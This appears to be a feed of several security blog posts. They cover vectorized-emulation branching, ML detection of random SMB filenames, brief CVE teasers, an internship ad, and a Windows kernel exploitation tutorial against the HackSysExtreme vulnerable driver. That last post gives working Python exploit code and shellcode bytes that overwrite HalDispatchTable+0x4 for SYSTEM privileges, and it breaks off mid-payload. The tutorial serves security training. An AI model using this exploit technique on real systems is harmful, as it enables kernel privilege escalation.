ROP is different everytime. There is no one way to do it. However, I did learn a lot from this article, and referenced it. Thank you, Peter! :) You are a beast!

Miniblog: How conditional branches work in Vectorized Emulation

7 October 2019 at 07:11

Twitter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I also do random one-off posts for cool data that doesn’t warrant an entire blog!

Let me know if you like this mini-blog format! It takes a lot less time than a whole blog, but I think will still have interesting content!


Prereqs

You should probably read the Introduction to Vectorized Emulation blog!

Or perhaps watch the talk I gave at RECON 2019

Summary

I spent this weekend working on a JIT for my IL (FalkIL, or fail). I thought this would be a cool opportunity to make a mini-blog describing how I currently handle conditional branches in vectorized emulation.

This is one of the most complex parts of vectorized emulation, and has a lot of depth. But today we’re going to go into a simple merging example. What I call the “auto-merge”. I call it an auto-merge because it doesn’t require any static analysis of potential merging points. The instructions that get emit simply allow for auto re-merging of divergent VMs. It’s really simple, but pretty nifty. We have to perform this logic on every branch.


FalkIL Example

Here’s an example of what FalkIL looks like:

FalkIL example


JIT

Here’s what the JIT for the above IL example looks like:

FalkIL JIT example

Ooof… that exploded a bit. Let’s dive in!


JIT Calling Convention

Before we can go into what the JIT is doing, we have to understand the calling convention we use. It’s important to note that this calling convention is custom, and follows no standard convention.

Kmask Registers

Kmask registers are the bitmasks provided to us in hardware to mask off certain operations. Since we’re always executing instructions even if some VMs have been disabled, we must always honor using kmasks.

Intel provides us with 8 kmask registers. k0 through k7. k0 is hardcoded in hardware to all ones (no masking). Thus, we’re not able to use this for general purpose masking.

Online VM mask

Since at any given time we might be performing operations with VMs disabled, we need to have one kmask register always dedicated to holding the mask of VMs that are actively running. Since k1 is the first general purpose kmask we can use, that’s exactly what we pick. Any bit which is clear in k1 (VM is disabled), must not have its state modified. Thus you’ll see k1 is used as a merging mask for almost every single vectorized operation we do.

By using the k1 mask in every instruction, we preseve the lanes of vector registers which are disabled. This provides near-zero-cost preservation of disabled VM states, such that we don’t have to save/restore massive ZMM registers during divergence.

This mask must also be honored during scalar code that emulates complex vectorized operations (for example divs, which have no vectorized instruction).

“Following” VM mask

At some points during emulation we run into situations where VMs have to get disabled. For example, some VMs might take a true branch, and others might take the false (or “else”) side of a branch. In this case we need to make a decision (very quickly) about which VM to follow. To do this, we have a VM which we mark as the “following” VM. We store this “following” VM mask in k7. This always contains a single bit, and it’s the bit of the VM which we will always follow when we have to make divergence decisions.

The VM we are “following” must always be active, and thus (k7 & k1) != 0 must always be true! This k7 mask only has to be updated when we enter the JIT, thus the computation of which VM to “follow” may be complex as it will not be a common expense. While the JIT is executing, this k7 mask will never have to be updated unless the VM we are following causes a fault (at which point a new VM to follow will be computed).

Kmask Register Summary

Here’s the complete state of kmask register allocation during JIT

K0    - Hardcoded in hardware to all ones
K1    - Bitmask indicating "active/online" VMs
K2-K6 - Scratch kmask registers
K7    - "Following" VM mask

ZMM registers

The 512-bit ZMM registers are where we store most of our active contextual data. There are only 2 special case ZMM registers which we reserve.

“Following” VM index vector

Following in the same suit of the “Following VM mask”, mentioned above, we also store the index for the “following” VM in all 8 64-bit lanes of zmm30. This is needed to make decisions about which VM to follow. At certain points we will need to see which VM’s “agree with” the VM we are following, and thus we need a way to quickly broadcast out the following VMs values to all components of a vector.

By holding the index (effectively the bit index of the following VM mask) in all lanes of the zmm30 vector, we can perform a single vpermq instruction to broadcast the following VM’s value to all lanes in a vector.

Similar to the VM mask, this only needs to be computed when the JIT is entered and when faults occur. This means this can be a more expensive operation to fill this register up, as it stays the same for the entirity of a JIT execution (until a JIT/VM exit).

Why this is important

Lets say:

zmm31 contains [10, 11, 12, 13, 14, 15, 16, 17]

zmm30 contains [3, 3, 3, 3, 3, 3, 3, 3]

The CPU then executes vpermq zmm0, zmm30, zmm31

zmm0 now contains [13, 13, 13, 13, 13, 13, 13, 13]… the 3rd VM’s value in zmm31 broadcast to all lanes of zmm0

Effectively vpermq uses the indicies in its second operand to select values from the third operand.

“Desired target” vector

We allocate one other ZMM register (zmm31) to hold the block identifiers for where each lane “wants” to execute. What this means is that when divergence occurs, zmm31 will have the corresponding lane updated to where the VM that diverged “wanted” to go. VMs which were disabled thus can be analyzed to see where they “wanted” to go, but instead they got disabled :(

ZMM Register Summary

Here’s the complete state of ZMM register allocation during JIT

Zmm0-Zmm3  - Scratch registers for internal JIT use
Zmm4-Zmm29 - Used for IL register allocation
Zmm30      - Index of the VM we are following broadcast to all 8 quadwords
Zmm31      - Branch targets for each VM, indicates where all VMs want to execute

General purpose registers

These are fairly simple. It’s a lot more complex when we talk about memory accesses and such, but we already talked about that in the MMU blog!

When ignoring the MMU, there are only 2 GPRs that we have a special use for…

Constant storage database

On the Knights Landing Xeon Phi (the CPU I develop vectorized emulation for), there is a huge bottleneck on the front-end and instruction decode. This means that loading a constant into a vector register by loading it into a GPR mov, then moving it into the lowest-order lane of a vector vmovq, and then broadcasting it vpbroadcastq, is actually a lot more expensive than just loading that value from memory.

To enable this, we need a database which just holds constants. During the JIT, constants are allocated from this table (just appending to a list, while deduping shared constants). This table is then pointed to by r11 during JIT. During the JIT we can load a constant into all active lanes of a VM by doing a single vpbroadcastq zmm, kmask, qword [r11+OFFSET] instruction.

While this might not be ideal for normal Xeon processors, this is actually something that I have benchmarked, and on the Xeon Phi, it’s much faster to use the constant storage database.

Target registers

At the end of the day we’re emulating some other architecture. We hold all target architecture registers in memory pointed to by r12. It’s that simple. Most of the time we hold these in IL registers and thus aren’t incurring the cost of accessing memory.

GPR summary

r11 - Points to constant storage database (big vector of quadword constants)
r12 - Points to target architecture registers

Phew

Okay, now we know what register states look like when executing in JIT!


Conditional branches

Now we can get to the meat of this mini-blog! How conditional branches work using auto-merging! We’re going to go through instruction-by-instruction from the JIT graph we showed above.

Here’s the specific code in question for a conditional branch:

Conditional Branch

Well that looks awfully complex… but it’s really not. It’s quite magical!

The comparison

comparison

First, the comparision is performed on all lanes. Remember, ZMM registers hold 8 separate 64-bit values. We perform a 64-bit unsigned comparison on all 8 components, and store the results into k2. This means that k2 will hold a bitmask with the “true” results set to 1, and the “false” results set to 0. We also use a kmask k1 here, which means we only perform the comparison on VMs which are currently active. As a result of this instruction, k2 has the corresponding bits set to 1 for VMs which were actively executing at the time, and also resulted in a “true” value from their comparisons.

In this case the 0x1 immediate to the vpcmpuq instruction indicates that this is a “less than” comparison.

vpcmpq/vpcmpuq immediate

Note that the immediate value provided to vpcmpq and the unsigned variant vpcmpuq determines the type of the comparison:

cmpimm

The comparison inversion

comparison inversion

Next, we invert the comparison operation to get the bits set for active VMs which want to go to the “false” path. This instruction is pretty neat.

kandnw performs a bitwise negation of the second operand, and then ands with the third operand. This then is stored into the first operand. Since we have k2 as the second operand (the result of the comparison) this gets negated. This then gets anded with k1 (the third operand) to mask off VMs which are not actively executing. The result is that k3 now contains the inverted result from the comparison, but we keep “offline” VMs still masked off.

In C/C++ this is simply: k3 = (~k2) & k1

The branch target vector

branch targets

Now we start constructing zmm0… this is going to hold the “labels” for the targets each active lane wants to go to. Think of these “labels” as just a unique identifier for the target block they are branching to. In this case we use the constant storage database (pointed to by r11) to load up the target labels. We first load the “true target” labels into zmm0 by using the k2 kmask, the “true” kmask. After this, we merge the “false target” labels into zmm0 using k3, the “false/inverted” kmask.

After these 2 instructions execute, zmm0 now holds the target “labels” based on their corresponding comparison results. zmm0 now tells us where the currently executing VMs “want to” branch to.

The merge into master

merge into master

Now we merge the target branches for the active VMs which were just computed (zmm0), into the master target register (zmm31). Since VMs can be disabled via divergence, zmm31 holds the “master” copy of where all VMs want to go (including ones which have been masked off and are “waiting” to execute a certain target).

zmm31 now holds the target labels for every single lane with the updated results of this comparison!

Broadcasting the target

broadcasting the target

Now that we have zmm31 containing all of the branch targets, we now have to pick the one we are going to follow. To do this, we want a vector which contains the broadcasted target label of the VM we are following. As mentioned in the JIT calling convention section, zmm30 contains the index of the VM we are following in all 8 lanes.

Example

Lets say for example we are following VM #4 (zero-indexed).

zmm30 contains [4, 4, 4, 4, 4, 4, 4, 4]

zmm31 contains [block_0, block_0, block_1, block_1, block_2, block_2, block_2, block_2]

After the vpermq instruction we now have zmm1 containing [block_2, block_2, block_2, block_2, block_2, block_2, block_2, block_2].

Effectively, zmm1 will contain the block label for the target that the VM we are following is going to go to. This is ultimately the block we will be jumping to!

Auto-merging

auto-merging

This is where the magic happens. zmm31 contains where all the VMs “want to execute”, and zmm1 from the above instruction contains where we are actually going to execute. Thus, we compute a new k1 (active VM kmask) based on equality between zmm31 and zmm1.

Or in more simple terms… if a VM that was previously disabled was waiting to execute the block we’re about to go execute… bring it back online!

Doin’ the branch

branching

Now we’re at the end. k2 still holds the true targets. We and this with k7 (the “following” VM mask) to figure out if the VM we are following is going to take the branch or not.

We then need to make this result “actionable” by getting it into the eflags x86 register such that we can conditionally branch. This is done with a simple kortestw instruction of k2 with itself. This will cause the zero flag to get set in eflags if k2 is equal to zero.

Once this is done, we can do a jnz instruction (same as jne), causing us to jump to the true target path if the k2 value is non-zero (if the VM we’re following is taking the true path). Otherwise we fall through to the “false” path (or potentially branch to it if it’s not directly following this block).


Update

After a little nap, I realized that I could save 2 instructions during the conditional branch. I knew something was a little off as I’ve written similar code before and I never needed an inverse mask.

updated JIT

Here we’ll note that we removed 2 instructions. We no longer compute the inverse mask. Instead, we initially store the false target block labels into zmm31 using the online mask (k1). This temporarly marks that “all online VMs want to take the false target”. Then, using the k2 mask (true targets), merge over zmm31 with the true target block labels.

Simple! We remove the inverse mask computation kandnw, and the use of the zmm0 temporary and merge directly into zmm31. But the effect is exactly the same as the previous version.

Not quite sure why I thought the inverse mask was needed, but it goes to show that a little bit of rest goes a long way!

Due to instruction decode pressure on the Xeon Phi (2 instructions decoded per cycle), this change is a minimum 1 cycle improvement. Further, it’s a reduction of 8 bytes of code per conditional branch, which reduces L1i pressure. This is likely in the single digit percentages for overall JIT speedup, as conditional branches are everywhere!


Fin

And that’s it! That’s currently how I handle auto-merging during conditional branches in vectorized emulation as of today! This code is often changed and this is probably not its final form. There might be a simpler way to achieve this (fewer instructions, or lower latency instructions)… but progress always happens over time :)

It’s important to note that this auto-merging isn’t perfect, and most cases will result in VMs hanging, but this is an extremely low cost way to bring VMs online dynamically in even the tightest loops. More macro-scale merging can be done with smarter static-analysis and control flow decisions.

I hope this was a fun read! Let me know if you want more of these mini-blogs.


Detecting random filenames using (un)supervised machine learning

By: Fox IT
16 October 2019 at 11:00

Combining both n-grams and random forest models to detect malicious activity.

Author: Haroen Bashir

An essential part of Managed Detection and Response at Fox-IT is the Security Operations Center. This is our frontline for detecting and analyzing possible threats. Our Security Operations Center brings together the best in human and machine analysis and we continually strive to improve both. For instance, we develop machine learning techniques for detecting malicious content such as DGA domains or unusual SMB traffic. In this blog entry we describe a possible method for random filename detection.

During traffic analysis of lateral movement we sometimes recognize random filenames, indicating possible malicious activity or content. Malicious actors often need to move through a network to reach their primary objective, more popularly known as lateral movement [1].

There is a variety of routes for adversaries to perform lateral movement. Attackers can use penetration testing frameworks such as Metasploit [3] or Microsoft Sysinternal application PsExec. This application creates the possibility for remote command execution over the SMB protocol [4].

Due to its malicious nature we would like to detect lateral movement as quickly as possible. In this blogpost we build on our previous blog entry [2] and we describe how we can apply the magic of machine learning in detection of random filenames in SMB traffic.

Supervised versus unsupervised detection models 

Machine learning can be applied in various domains. It is widely used for prediction and classification models, which suits our purpose perfectly. We investigated two possible machine learning architectures for random filename detection.

The first detection method for random filenames is set up by creating bigrams of filenames,  which you can find more information about in our previous post [2]. This detection method is based on unsupervised learning. After the model learns a baseline of common filenames, it can now detect when filenames don’t belong in its learned baseline.

This model has a drawback; it requires a lot of data. The solution can be found with supervised machine learning models. With supervised machine learning we feed a model data whilst simultaneously providing the label of the data. In our current case, we label data as either random or not-random.

A powerful supervised machine learning model is the random forest. We picked this architecture as it’s widely used for predictive models in both classification and regression problems. For an introduction into this technique we advise you to see [4]. The random forest is based on multiple decision trees, increasing the stability of a detection model. The following diagram illustrates the architecture of the detection model we built.

Similar to the first model, we create bigrams of the filenames. The model cannot train on bigrams however, so we have to map the bigrams into numerical vectors. After training and testing the model we then focus on fine-tuning hyperparameters. This is essential for increasing the stability of the model. An important hyperparameter of the random forest is depth. A greater depth will create more decision splits in the random forest, which can easily cause overfitting. It is therefore highly desirable to keep the depth as low as possible, whilst simultaneously maintaining high precision rates.Results

Proper data is one of the most essential parts in machine learning. We gathered our data by scraping nearly 180.000 filenames from SMB logs of our own network. Next to this, we generated 1.000 random filenames ourselves. We want to make sure that the models don’t develop a bias towards for example the extension “.exe”, so we stripped the extensions from the filenames.

As we stated earlier the bigrams model is based on our previously published DGA detection model. This model has been trained on 90% percent of filenames. It is then tested on the remaining filenames and 100% of random filenames.

The random forest has been trained and tested in multiple folds, which is a cross validation technique[6]. We evaluate our predictions in a joint confusion matrix which is illustrated below.

True positives are shown in the upper right column, the bigrams model detected 71% of random filenames and the random forest detected 81% of random filenames. As you can see the models produce low false positive rates, in both models ~0% of not random filenames have been incorrectly classified as random. This is great for use in our Security Operations Center, as this keeps the workload on the analysts consistent.

The F1-scores are 0.83 and 0.89 respectively. Because we focus on adding detection with low false positive rates, it is not our priority to reduce the false negative rates. In future work we will take a better look at the false negative rates of the models.

We were quite interested in differences in both detection models. Looking at the visualization below we can observe that both models equally detect 572 random filenames. They separately detect 236 and 141 random filenames respectively. The bigrams model might miss more random filenames due to its unsupervised architecture. It is possible that the bigrams model requires more data to create it’s baseline and therefore doesn’t perform as well as the supervised random forest.The overlap in both models and the low false positive rate gave us the idea to run both these models cooperatively for detection of random filenames. It doesn’t cost much processing and we would gain a lot! In practical setting this would mean that if a random filename slips by one detection model, it is still possible for the other model to detect this. In theory, we detect 90% of random filenames! The low false positive rates and complementary aspects of the detection models indicate that this setup could be really useful for detection in our Security Operations Center.

Conclusion

During traffic analysis in our Security Operations Center we sometimes recognize random filenames, indicating possible lateral movement. Malicious actors can use penetration testing frameworks (e.g. Metasploit) and Microsoft processes (e.g. PsExec) for lateral movement. If adversaries are able to do this, they can easily compromise a (sub)network of a target. Needless to say that we want to detect this behavior as quickly as possible.

In this blog entry we described how we applied machine learning in order to detect these random filenames. We showed two models for detection: a bigrams model and a random forest. Both these models yield good results in testing stage, indicated by the low false positive rates. We also looked at the overlap in predictions from which we concluded that we can detect 90% of random filenames in SMB traffic! This gave us the idea to run both detection models cooperatively in our Security Operations Center.

For future work we would like to research the usability of these models on endpoint data, as our current research is solely focused on detection in network traffic. There is for instance lots of malware that outputs random filenames on a local machine. This is just one of many possibilities which we can better investigate.

All in all, we can confidently conclude that machine learning methods are one of many efficient ways to keep up with adversaries and improve our security operations!

 

References

[1] – https://attack.mitre.org/tactics/TA0008/

[2] – https://blog.fox-it.com/2019/06/11/using-anomaly-detection-to-find-malicious-domains.

[3] – https://www.offensive-security.com/metasploit-unleashed/pivoting/

[4] – https://www.mindpointgroup.com/blog/lateral-movement-with-psexec/

[5] – https://medium.com/@williamkoehrsen/random-forest-simple-explanation-377895a60d2d

[6] – https://towardsdatascience.com/why-and-how-to-cross-validate-a-model-d6424b45261f

 

 

 

 

 

Exploiting an old noVNC XSS (CVE-2017-18635) in OpenStack

19 October 2019 at 17:40
TL;DR: noVNC had a DOM-based XSS that allowed attackers to use a malicious VNC server to inject JavaScript code inside the web page. As OpenStack uses noVNC and its patching system doesn’t update third parties’ software, fully-updated OpenStack installations may still be vulnerable. Introduction Last week I was testing an OpenStack infrastructure during a Penetration Test. OpenStack is a free and open-source software platform for cloud computing, where you can manage and deploy virtual servers and other resources.

Don’t open that XML: XXE to RCE in XML plugins for VS Code, Eclipse, Theia, …

24 October 2019 at 17:22
TL;DR LSP4XML, the library used to parse XML files in VSCode-XML, Eclipse’s wildwebdeveloper, theia-xml and more, was affected by an XXE (CVE-2019-18213) which lead to RCE (CVE-2019-18212) exploitable by just opening a malicious XML file. Introduction 2019 seems to be XXE’s year: during the latest Penetration Tests we successfully exploited a fair amount of XXEs, an example being https://www.shielder.it/blog/exploit-apache-solr-through-opencms/. It all started during a web application penetration test, while I was trying to exploit a blind XXE with zi0black.

Internship at Doyensec

4 November 2019 at 23:00

“Our moral responsibility is not to stop the future, but to shape it…” — Alvin Toffler

At Doyensec, we feel responsible for what the future of information security will look like. We want a safe and open Internet and we believe that hackers play an important role. As a part of our give back strategy, we want to find ways of transferring our knowledge to new generations.

Doyensec interns work alongside experienced security researchers during live customer engagements. They receive full time support from senior staff members and are encouraged to explore individual research projects. Additionally, they are included in all team meetings so they can learn and share in the different experiences arising from our work. In short, we want to provide a comprehensive experience on what it means to be a first-class security consultant in the vulnerability research space.

The internship program @Doyensec represents an opportunity to learn new infosec skills. We also hope it becomes a memorable personal experience. It lasts 2-3 months and is a mix of remote and in-person interactions.

We offer each candidate a transparent recruitment process in 3 simple steps:

  • 1) Introductory call to understand one’s motivation for applying and their availability over the upcoming months
  • 2) Online challenges to evaluate technical skillset (web security testing)
  • 3) Final call to discuss details
Doyensec internship process

Day 1

Day one is important. Interns will be responsible for setting up their Doyensec provided machine and will be introduced to the team. They will be assigned to a senior security researcher who will be at their disposal and act as mentor throughout the entire internship. They will learn how we schedule projects, communicate, and cooperate to ensure complete coverage during our testing activities. We will provide them with all necessary equipment to perform the work. Most importantly, they will learn about our values and things that we consider crucial for delivering high quality work.

Time allocation

While the internship is considered full time over the course of 2/3 months, we did have interns who were still studying and wanted to combine both work and school. We take pride in having a flexible company culture oriented around results and our approach to the internship is no different.

“For knowledge work, time spent has little to do with value created and the forty hour workweek is anachronistic nonsense.” — Naval Ravikant @naval

Work days are generally grouped into two categories:

a) Customer projects. Interns work on real-life projects. Whenever possible, we will try to match personal interest and skillset with tasks when allocating projects.

b) Research time. We strongly believe in research and practice, therefore we allow interns to spend 50% of their time on research topics. We will define goals together and provide guidance and feedback on the progress.

Testimonial

Mohamed Ouad is a student of computer science at the University of Milan. In the fall of 2018 he joined Doyensec as our second intern. We asked him a few questions to summarize his experience:

What did you learn during your internship?
“During this period I had the possibility to learn a lot of things, and not just technical stuff. For instance, I understood how to explain findings to non-technical audience and manage projects with strict deadlines.”

Have you improved your skillset?
“Definitely! I improved my knowledge of Android security and got interested in Google Chrome extensions security, static code review and Electron-based apps security.”

Will the internship have an impact on your career?
“This experience has given me a huge added value to my career path. I’ve not only learned a lot, but also created an important item in my curriculum that will be certainly useful for future opportunities. I suggest this “adventure” to everyone!”

More information on our internship program

The Doyensec internship program is open to students returning to full-time education for at least one semester. We accept candidates with residency in either US or Europe.

What do we offer:

  • Opportunity to perform professional security testing for both start ups and Fortune 500 companies
  • Ability to perform cutting-edge offensive research projects
  • Feedback and guidance
  • Attractive financial compensation

What do we expect from candidates?

Our perfect candidate:

  • Has already some experience with manual source code review and Burp Suite / OWASP ZAP
  • Learns quickly
  • Should be able to prepare reports in English
  • Is self-organized
  • Is able to learn from his/her mistakes
  • Has motivation to work/study and show initiative
  • Must be communicative (without this it is difficult to teach effectively)
  • Brings something to the mix (e.g. creativity, academic knowledge, etc.)

In contrast to full-time positions (we are always hiring web and mobile pentesters!), a good attitude is the most important factor we are looking for.

Do you want to join Doyensec as an intern? Apply via our careers portal!

Exploit Development: Windows Kernel Exploitation - Arbitrary Overwrites (Write-What-Where)

13 November 2019 at 00:00

Introduction

In a previous post, I talked about setting up a Windows kernel debugging environment. Today, I will be building on that foundation produced within that post. Again, we will be taking a look at the HackSysExtreme vulnerable driver. The HackSysExtreme team implemented a plethora of vulnerabilities here, based on the IOCTL code sent to the driver. The vulnerability we are going to take look at today is what is known as an arbitrary overwrite.

At a very high level what this means, is an adversary has the ability to write a piece of data (generally going to be a shellcode) to a particular, controlled location. As you may recall from my previous post, the reason why we are able to obtain local administrative privileges (NT AUTHORITY\SYSTEM) is because we have the ability to do the following:

  1. Allocate a piece of memory in user land that contains our shellcode
  2. Execute said shellcode from the context of ring 0 in kernel land

Since the shellcode is being executed in the context of ring 0, which runs as local administrator, the shellcode will be ran with administrative privileges. Since our shellcode will copy the NT AUTHORITY\SYSTEM token to a cmd.exe process- our shell will be an administrative shell.

Code Analysis

First let’s look at the ArbitraryWrite.h header file.

Take a look at the following snippet:

typedef struct _WRITE_WHAT_WHERE
{
    PULONG_PTR What;
    PULONG_PTR Where;
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;

typedef in C, allows us to create our own data type. Just as char and int are data types, here we have defined our own data type.

Then, the WRITE_WHAT_WHERE line, is an alias that can be now used to reference the struct _WRITE_WHAT_WHERE. Then lastly, an aliased pointer is created called PWRITE_WHAT_WHERE.

Most importantly, we have a pointer called What and a pointer called Where. Essentially now, WRITE_WHAT_WHERE refers to this struct containing What and Where. PWRITE_WHAT_WHERE, when referenced, is a pointer to this struct.

Moving on down the header file, this is presented to us:

NTSTATUS
TriggerArbitraryWrite(
    _In_ PWRITE_WHAT_WHERE UserWriteWhatWhere
);

Now, the variable UserWriteWhatWhere has been attributed to the datatype PWRITE_WHAT_WHERE. As you can recall from above, PWRITE_WHAT_WHERE is a pointer to the struct that contains What and Where pointers (Which will be exploited later on). From now on UserWriteWhatWhere also points to the struct.

Let’s move on to the source file, ArbitraryWrite.c.

The above function, TriggerArbitraryWrite() is passed to the source file.

Then, the What and Where pointers declared earlier in the struct, are initialized as NULL pointers:

PULONG_PTR What = NULL;
PULONG_PTR Where = NULL;

Then finally, we reach our vulnerability:

#else
        DbgPrint("[+] Triggering Arbitrary Write\n");

        //
        // Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability
        // because the developer is writing the value pointed by 'What' to memory location
        // pointed by 'Where' without properly validating if the values pointed by 'Where'
        // and 'What' resides in User mode
        //

        *(Where) = *(What);

As you can see, an adversary could write the value pointed by What to the memory location referenced by Where. The real issue is that there is no validation, using a Windows API function such as ProbeForRead() and ProbeForWrite, that confirms whether or not the values of What and Where reside in user mode. Knowing this, we will be able to utilize our user mode shellcode going forward for the exploit.

IOCTL

As you can recall in the last blog, the IOCTL code that was used to interact with the HEVD vulnerable driver and take advantage of the TriggerStackOverflow() function, occurred at this routine:

After tracing the IOCTL routine that jumps into the TriggerArbitraryOverwrite() function, here is what is displayed:

The above routine is part of a chain as displayed as below:

Now time to calculate the IOCTL code- which allows us to interact with the vulnerable routine. Essentially, look at the very first routine from above, that was utilized for my last blog post. The IOCTL code was 0x222003. (Notice how the value is only 6 digits, even though x86 requires 8 digits in a memory address. 0x222003 = 0x00222003) The instruction of sub eax, 0x222003 will yield a value of zero, and the jz short loc_155FB (jump if zero) will jump into the TriggerStackOverflow() function. So essentially using deductive reasoning, EAX contains a value of 0x222003 at the time the jump is taken.

Looking at the second and third routines in the image above:

sub eax, 4
jz short loc_155E3

and

sub eax, 4
jz short loc_155CB

Our goal is to successfully complete the “jump if zero” jump into the applicable vulnerability. In this case, the third routine shown above, will lead us directly into the TriggerArbitraryOverwrite(), if the corresponding “jump if zero” jump is completed.

If EAX is currently at 0x222003, and EAX is subtracted a total of 8 times, let’s try adding 8 to the current IOCTL code from the last exploit- 0x222003. Adding 8 will give us a value of 0x22200B, or 0x0022200B as a legitimate x86 value. That means by the time the value of EAX reaches the last routine, it will equal 0x222003 and make the applicable jump into the TriggerArbitraryOverwrite() function!

Proof Of Concept

Utilizing the newly calculated IOCTL, let’s create a POC:

import struct
import sys
import os
from ctypes import *
from subprocess import *

# DLLs for Windows API interaction
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

poc = "\x41\x41\x41\x41"                # What
poc += "\x42\x42\x42\x42"               # Where
poc_length = len(poc)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    poc,                                # lpInBuffer
    poc_length,                         # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

After setting up the debugging environment, run the POC. As you can see- What and Where have been cleanly overwritten!:

HALp! How Do I Hax?

At the current moment, we have the ability to write a given value at a certain location. How does this help? Let’s talk a bit more on the ability to execute user mode shellcode from kernel mode.

In the stack overflow vulnerability, our user mode memory was directly copied to kernel mode- without any check. In this case, however, things are not that straight forward. Here, there is no memory copy DIRECTLY to kernel mode.

However, there is one way we can execute user mode shellcode from kernel mode. Said way is via the HalDispatchTable (Hardware Abstraction Layer Dispatch Table).

Let’s talk about why we are doing what we are doing, and why the HalDispatchTable is important.

The hardware abstraction layer, in Windows, is a part of the kernel that provides routines dealing with hardware/machine instructions. Basically it allows multiple hardware architectures to be compatible with Windows, without the need for a different version of the operating system.

Having said that, there is an undocumented Windows API function known as NtQueryIntervalProfile().

What does NtQueryIntervalProfile() have to do with the kernel? How does the HalDispatchTable even help us? Let’s talk about this.

If you disassemble the NtQueryIntervalProfile() in WinDbg, you will see that a function called KeQueryIntervalProfile() is called in this function:

uf nt!NtQueryIntervalProfile:

If we disassemble the KeQueryIntervalProfile(), you can see the HalDispatchTable actually gets called by this function, via a pointer!

uf nt!KeQueryIntervalProfile:

Essentially, the address at HalDispatchTable + 0x4, is passed via KeQueryIntervalProfile(). If we can overwrite that pointer with a pointer to our user mode shellcode, natural execution will eventually execute our shellcode, when NtQueryIntervalProfile() (which calls KeQueryIntervalProfile()) is called!

Order Of Operations

Here are the steps we need to take, in order for this to work:

  1. Enumerate all drivers addresses via EnumDeviceDrivers()
  2. Sort through the list of addresses for the address of ntkornl.exe (ntoskrnl.exe exports KeQueryIntervalProfile())
  3. Load ntoskrnl.exe handle into LoadLibraryExA and then enumerate the HalDispatchTable address via GetProcAddress
  4. Once the HalDispatchTable address is found, we will calculate the address of HalDispatchTable + 0x4 (by adding 4 bytes), and overwrite that pointer with a pointer to our user mode shellcode

EnumDeviceDrivers()

# Enumerating addresses for all drivers via EnumDeviceDrivers()
base = (c_ulong * 1024)()
get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    c_int(1024),                      # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

This snippet of code enumerates the base addresses for the drivers, and exports them to an array. After the base addresses have been enumerated, we can move on to finding the address of ntoskrnl.exe

ntoskrnl.exe

# Cycle through enumerated addresses, for ntoskrnl.exe using GetDeviceDriverBaseNameA()
for base_address in base:
    if not base_address:
        continue
    current_name = c_char_p('\x00' * 1024)
    driver_name = psapi.GetDeviceDriverBaseNameA(
        base_address,                 # ImageBase (load address of current device driver)
        current_name,                 # lpFilename
        48                            # nSize (size of the buffer, in chars)
    )

    # Error handling if function fails
    if not driver_name:
        print "[+] GetDeviceDriverBaseNameA() function call failed!"
        sys.exit(-1)

    if current_name.value.lower() == 'ntkrnl' or 'ntkrnl' in current_name.value.lower():

        # When ntoskrnl.exe is found, return the value at the time of being found
        current_name = current_name.value

        # Print update to show address of ntoskrnl.exe
        print "[+] Found address of ntoskrnl.exe at: {0}".format(hex(base_address))

        # It assumed the information needed from the for loop has been found if the program has reached execution at this point.
        # Stopping the for loop to move on.
        break

This is a snippet of code that essentially will loop through the array where all of the base addresses have been exported to, and search for ntoskrnl.exe via GetDeviceDriverBaseNameA(). Once that has been found, the address will be stored.

LoadLibraryExA()

# Beginning enumeration
kernel_handle = kernel32.LoadLibraryExA(
    current_name,                       # lpLibFileName (specifies the name of the module, in this case ntlkrnl.exe)
    None,                               # hFile (parameter must be null)
    0x00000001                          # dwFlags (DONT_RESOLVE_DLL_REFERENCES)
)

# Error handling if function fails
if not kernel_handle:
    print "[+] LoadLibraryExA() function failed!"
    sys.exit(-1)

In this snippet, LoadLibraryExA() receives the handle from GetDeviceDriverBaseNameA() (which is ntoskrnl.exe in this case). It then proceeds, in the snippet below, to pass the handle loaded into memory (which is still ntoskrnl.exe) to the function GetProcAddress().

GetProcAddress()

hal = kernel32.GetProcAddress(
    kernel_handle,                      # hModule (handle passed via LoadLibraryExA to ntoskrnl.exe)
    'HalDispatchTable'                  # lpProcName (name of value)
)

# Subtracting ntoskrnl base in user mode
hal -= kernel_handle

# Add base address of ntoskrnl in kernel mode
hal += base_address

# Recall earlier we were more interested in HAL + 0x4. Let's grab that address.
real_hal = hal + 0x4

# Print update with HAL and HAL + 0x4 location
print "[+] HAL location: {0}".format(hex(hal))
print "[+] HAL + 0x4 location: {0}".format(hex(real_hal))

GetProcAddress() will reveal to us the address of the HalDispatchTable and HalDispatchTable + 0x4. We are more interested in HalDispatchTable + 0x4.

Once we have the address for HalDispatchTable + 0x4, we can weaponize our exploit:

# HackSysExtreme Vulnerable Driver Kernel Exploit (Arbitrary Overwrite)
# Author: Connor McGarr

import struct
import sys
import os
from ctypes import *
from subprocess import *

# DLLs for Windows API interaction
kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

class WriteWhatWhere(Structure):
    _fields_ = [
        ("What", c_void_p),
        ("Where", c_void_p)
    ]

payload = bytearray(
    "\x90\x90\x90\x90"                # NOP sled
    "\x60"                            # pushad
    "\x31\xc0"                        # xor eax,eax
    "\x64\x8b\x80\x24\x01\x00\x00"    # mov eax,[fs:eax+0x124]
    "\x8b\x40\x50"                    # mov eax,[eax+0x50]
    "\x89\xc1"                        # mov ecx,eax
